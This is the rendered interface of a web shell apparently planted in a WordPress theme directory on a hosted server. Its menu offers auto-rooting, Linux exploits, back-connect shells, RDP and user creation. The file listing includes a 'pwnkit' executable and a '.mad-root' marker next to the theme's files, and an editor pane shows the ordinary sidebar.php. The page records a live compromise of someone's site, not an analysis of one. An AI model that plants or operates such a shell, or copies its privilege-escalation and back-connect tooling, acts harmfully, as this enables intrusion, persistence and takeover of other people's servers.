Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
astra /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
687
B
-rw-r--r--
SECURITY.md
427
B
-rw-r--r--
archive.php
729
B
-rw-r--r--
changelog.txt
165.83
KB
-rw-r--r--
comments.php
4.5
KB
-rw-r--r--
footer.php
605
B
-rw-r--r--
functions.php
8.51
KB
-rw-r--r--
header.php
1.37
KB
-rw-r--r--
index.php
906
B
-rw-r--r--
page.php
868
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
7.87
KB
-rw-r--r--
screenshot.jpg
357.85
KB
-rw-r--r--
search.php
771
B
-rw-r--r--
searchform.php
2.22
KB
-rw-r--r--
sidebar.php
1000
B
-rw-r--r--
single.php
695
B
-rw-r--r--
style.css
4.46
KB
-rw-r--r--
theme.json
2.35
KB
-rw-r--r--
toolset-config.json
7.46
KB
-rw-r--r--
wpml-config.xml
5.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.php
<?php /** * The sidebar containing the main widget area. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } $astra_sidebar = apply_filters( 'astra_get_sidebar', 'sidebar-1' ); echo '<div '; echo wp_kses_post( astra_attr( 'sidebar', array( 'id' => 'secondary', 'class' => join( ' ', astra_get_secondary_class() ), ) ) ); echo '>'; ?> <div class="sidebar-main" <?php /** @psalm-suppress TooManyArguments */ echo apply_filters( 'astra_sidebar_data_attrs', '', $astra_sidebar ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped, Generic.Commenting.DocComment.MissingShort ?>> <?php astra_sidebars_before(); ?> <?php if ( is_active_sidebar( $astra_sidebar ) ) { dynamic_sidebar( $astra_sidebar ); } astra_sidebars_after(); ?> </div><!-- .sidebar-main --> </div><!-- #secondary -->
Close